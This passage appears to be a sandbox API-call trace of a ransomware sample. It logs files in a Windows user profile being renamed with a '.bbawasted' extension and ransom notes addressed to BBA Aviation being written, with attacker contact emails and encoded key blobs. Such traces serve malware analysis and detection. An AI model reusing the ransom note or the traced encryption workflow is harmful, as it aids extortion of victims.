PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]rPRXRfsgz9ln6rE6FDHTDt7Y2YgS2F8yUHVZGj8lwtYJ/tIVgmZL984I0g4iLGOZ\r\ne9f5GiHZZ4q0XQemETCI5mF33Er2wThafkQJ6H6Yq90h+Y858zUnC1sJeQM/bVlY\r\nho0DZVIomz66S80IbWaxuv3gm25IdpYonyTem2gJadB9zqzPoiBACKMO81cLaOQw\r\n4Nw5h/8dzmlimpR7K8x+Vpjp9uO3/UrWLtbzAf8PmReHfvOGTMbBGMYN5WbEHvRs\r\nvjpnbbOCxc8o4GKORwmONRF8aoxXN9YGBv82Cqh4nfyPIH12VMwu2kA75WbpA0PY\r\nFG6UIlQPPL0e9VC7BjulyP9pWoQyqpTdGh2brTmaqHPxuDLnGCGP58MxN98QgkaH\r\nVjSDWgi7IWlQYlpg/V3HCIX/xn+qbnJ5zRLhpuIS/bWOMR7o5i9/ROHyaipSb6HW\r\nY5ODy1ALczixE+6/c1GHv9z/E29yb+93JxJoCmvFh7c4Z/UNkc0C22QtMmFXoS8g\r\nCe63Ahinbu0LfEtV5g+ng9KRUzLSyUh7rFBCJ9pAIJM8ObU7i8awIo07tdl90jsi\r\ndet92bhmsG4v5VSBuSkmNlTq20Hs/c36XmQwwpoPx2vZwQ1QzHN7SvQad1mxMYdf\r\n0Fx0BIjC09CewbykEwLHeIMsPYy3/MedqylfGRnnvJz=[end_key]\r\nKEEP IT\r\n") returned 984 [0228.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0228.240] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0228.240] SetEndOfFile (hFile=0x28c) returned 1 [0228.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.243] CloseHandle (hObject=0x28c) returned 1 [0228.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0228.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b36f8 | out: hHeap=0x660000) returned 1 [0228.243] _aulldvrm () returned 0x0 [0228.243] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a65f8) returned 1 [0228.244] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0228.244] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0228.244] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\_9LdXu.png") returned 39 [0228.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6bc8e0 [0228.244] lstrcpyW (in: lpString1=0x6bc92e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0228.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.245] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0228.245] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0228.245] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0228.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\_9LdXu.png.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\_9ldxu.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0228.246] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0228.247] SetEndOfFile (hFile=0x28c) returned 1 [0228.248] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0228.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.248] lstrcpyW (in: lpString1=0x6bc92e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0228.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\_9LdXu.png" (normalized: "c:\\users\\fd1hvy\\pictures\\_9ldxu.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\_9LdXu.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\_9ldxu.png.bbawasted")) returned 1 [0228.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\_9LdXu.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\_9ldxu.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0228.249] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0228.250] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x9ffc [0228.250] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9ffc) returned 0x5f0000 [0228.250] CloseHandle (hObject=0x294) returned 1 [0228.251] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0228.252] CloseHandle (hObject=0x27c) returned 1 [0228.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0228.252] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6680) returned 1 [0228.253] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0228.253] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0228.253] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a63d8) returned 1 [0228.253] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0228.254] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0228.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0228.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0228.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0228.437] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]XmAvJ6BGPurz0Tvev55kgTUDYhe2a3ncWXYVeoNHtc9LqCbLQ+MCbVSCs3MlfJnQ\r\nceVBNArh0nFK1Akv6mspgnjla1qOEj2PxJ2kmR9cVkznDDcTymevQvQBK/Hac0Z9\r\nPXFpvptoYwMxJV2Gy/yfNDNbdzsgk2EvzC6bYlPbl1khSqYP6vhMLBF/ZLusORCM\r\nWUTHz6PPQDhnb5KyC7BIBAo4PTEdRScG2Hd5KIQmS5Nv+VL+pti+G8HxZP6LlpXP\r\nUuuZC3VWocRaKolUeMyIhTbafN2fcu1jKvMuhKq7BEHIRjypzR+GbwfbguJOqwZF\r\nCwgQwWtgTk2jL4geL9yZb7ulKNiz+25gytRtxOLvzgCVWcoEOyvQesc6k8+63+V/\r\nqgF59aRK3jRw6a+zPlMama/ZMnaNjRjYf0sKHyBydErlPj6Ex+BmbW1UCPxOrEnZ\r\n2l+IVk4Dulq0LU1DxhcKiKHbE08Tq/+aaP4VbOUHZ7cZvlrGXO+YCyPWJIRC6f5Q\r\nN6dc59YPJQDFyJLtUUVjVAFVcCQRYTAOWQ2jwGzPtG5qOyQRE9TSlGRXxhN7dB3f\r\n2JBLWsLiRAHk8Fs4PTJsnDirEFTD33wNNxqgpPBi5Hym31dQm+Emu0atP+XacXp2\r\nrihakoqHU5dsdBfWoDEdPjGdhKvnXdg6FbWmLr7g3g7=[end_key]\r\nKEEP IT\r\n") returned 984 [0228.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0228.437] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0228.437] SetEndOfFile (hFile=0x28c) returned 1 [0228.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0228.440] CloseHandle (hObject=0x28c) returned 1 [0228.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0228.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b40d0 | out: hHeap=0x660000) returned 1 [0228.441] _aulldvrm () returned 0x0 [0228.441] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a69b0) returned 1 [0228.442] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0228.442] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0228.442] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms") returned 56 [0228.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6bc8e0 [0228.442] lstrcpyW (in: lpString1=0x6bc950, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0228.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0228.442] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6460) returned 1 [0228.443] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0228.443] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0228.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\searches\\indexed locations.search-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0228.444] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0228.446] SetEndOfFile (hFile=0x28c) returned 1 [0228.446] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0228.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0228.446] lstrcpyW (in: lpString1=0x6bc950, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0228.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\fd1hvy\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.bbawasted" (normalized: "c:\\users\\fd1hvy\\searches\\indexed locations.search-ms.bbawasted")) returned 1 [0228.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.bbawasted" (normalized: "c:\\users\\fd1hvy\\searches\\indexed locations.search-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.448] GetLastError () returned 0x5 [0228.448] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.bbawasted" (normalized: "c:\\users\\fd1hvy\\searches\\indexed locations.search-ms.bbawasted")) returned 0x23 [0228.448] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.bbawasted", dwFileAttributes=0x22) returned 1 [0228.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.bbawasted" (normalized: "c:\\users\\fd1hvy\\searches\\indexed locations.search-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0228.449] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0228.449] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xf8 [0228.449] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf8) returned 0x5f0000 [0228.449] CloseHandle (hObject=0x294) returned 1 [0228.450] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0228.450] CloseHandle (hObject=0x27c) returned 1 [0228.450] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.bbawasted", dwFileAttributes=0x23) returned 1 [0228.450] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0228.450] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6d68) returned 1 [0228.451] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0228.451] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0228.451] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6b48) returned 1 [0228.452] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0228.452] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0228.463] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0228.463] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0228.463] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0228.463] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]qiyDfXlFh3nKR3Acd1Ed2hl1Uh2mqThzQEL8KgIT5Vl71gYEf+BCmrbrUOFSw5B0\r\nQOXK7D1oMSfYlPCCTb8q9yZbsLMRB3KxcmS+tCk1MzGwT+IGeReJl7iP/tC8g7pF\r\na52+rGBl5osWxoOcwEpr41FRbm7C11rHlTfnaI27m3zcoL/uWAxVOi/bnh7lCU1h\r\ny1nv3RzgLqXlPT3dSt3p4++SIvTFSYLcdUXD/oc7uJLiT8Y0xULkTRaq6Onm0Pdc\r\nVRUAnRhXiYjMcIrnEITWyRMHzZwzkJ8bNshyd1vENuj8RYJGnomFjs2IrwXMcyBU\r\nizBxSh/hbBwtHfwfTWuWKZEwvzKv4YXBmfJwGBjg5VLdWXMvgogbJW+JaU4OSpjY\r\nGZbmuEbikgv5LQ6IsFOdG533Hxj63XQyMt2b3S/+8S10arQyVBqx12C7gzxgf6wh\r\ngY1iAVNoNmm6J+dE02CY6qFkVj/aiqNJ5XMKCM0KBlH9/Wc/1QPHr6nGWrrDW1OT\r\nY6ZJ4QImcsxeU/oTnjeCcNtJy7Pgt7oaALPPPH3i4d69R8VvpgP+V81tRywhF/Uk\r\nD4eunY1hJfJUh1zUe4QHRAOEdpDpKG7uDeFdux71mQTDClLXeZm93HjOItywdgG+\r\nYAdgZCVUN298cBI6CYW1UYchpGwFO5oxL7Ld+fTnATn=[end_key]\r\nKEEP IT\r\n") returned 984 [0228.463] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0228.463] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0228.463] SetEndOfFile (hFile=0x28c) returned 1 [0228.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0228.466] CloseHandle (hObject=0x28c) returned 1 [0228.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0228.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aacc8 | out: hHeap=0x660000) returned 1 [0228.467] _aulldvrm () returned 0x0 [0228.467] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a62c8) returned 1 [0228.467] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0228.467] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0228.468] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned 103 [0228.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2d8) returned 0x6bc8e0 [0228.468] lstrcpyW (in: lpString1=0x6bc9ae, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0228.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0228.468] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a64e8) returned 1 [0228.469] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0228.469] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0228.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0228.912] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0228.913] SetEndOfFile (hFile=0x28c) returned 1 [0228.913] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0228.913] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0228.913] lstrcpyW (in: lpString1=0x6bc9ae, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0228.913] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.bbawasted" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.bbawasted")) returned 1 [0228.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.bbawasted" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0228.917] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0228.918] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x357 [0228.918] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x357) returned 0x5f0000 [0228.918] CloseHandle (hObject=0x294) returned 1 [0228.958] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0228.962] CloseHandle (hObject=0x27c) returned 1 [0228.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0228.962] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a62c8) returned 1 [0228.963] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0228.963] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0228.963] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a62c8) returned 1 [0228.964] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0228.964] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0228.972] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0228.972] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0228.972] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.973] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Ml9xmdJidiq7c7tw70g1rQpKu3Q1g8G2lyztWKcKpFkN7HTldTZQjnxDIAlGgHw9\r\nmznJNVgIW8PkUMADNc1TUDUZfL7PXBnMVbjuENabXtSSh2QeTlX6cO0Dwn4tuxAD\r\nfy/nZn7B1dgEDxyICcYUnjLrsllnu9mG//nnewTcfRLqOmFmnQCuGzOcaUm5i/y4\r\nfYLyyHxaoEz1Pd5miaF3rzPYJSMgSOK1C43bf+G3nlIWstzf+C1FYZjEMOLuy+zZ\r\nxLFmmyXONFVUCcF1cUvDMr8o+HqifC9WlERFV7S5LNAhV7f4s9eaB1TNVbX7XSaO\r\nCW/5YSzC4l/1URNVnpyq+BlgBMrScI5g/phPS8TIkKh/3QO9yAfuziarQYUD2pNf\r\nPTpprKnQ213w8DEq1wEsmiSFH8Qq3694WgmXpaKqY6enAaklutMY3hWZteGU8frP\r\nqFez5w14amyre1PTm2wjncRC+omQAoErJM70QtS3Xn5NJdeZR0DHn87u11feGEx4\r\nwnfpuIGE83hagSz/+BqCP54JScIy//xsHVsiZ15zx5EVOvs0tIj9W3pruWPSg9lB\r\ndrs2x+FwW+exLPy3/JWXi/Y8BoxrjaSEz/DF/lxhYwljA1jM8DL3i2CYKgmFzea6\r\nv2LhRDT8VA+58FgCuED0GOsxEzZsu1cXBpMFFc35IkX=[end_key]\r\nKEEP IT\r\n") returned 984 [0228.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0228.973] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, 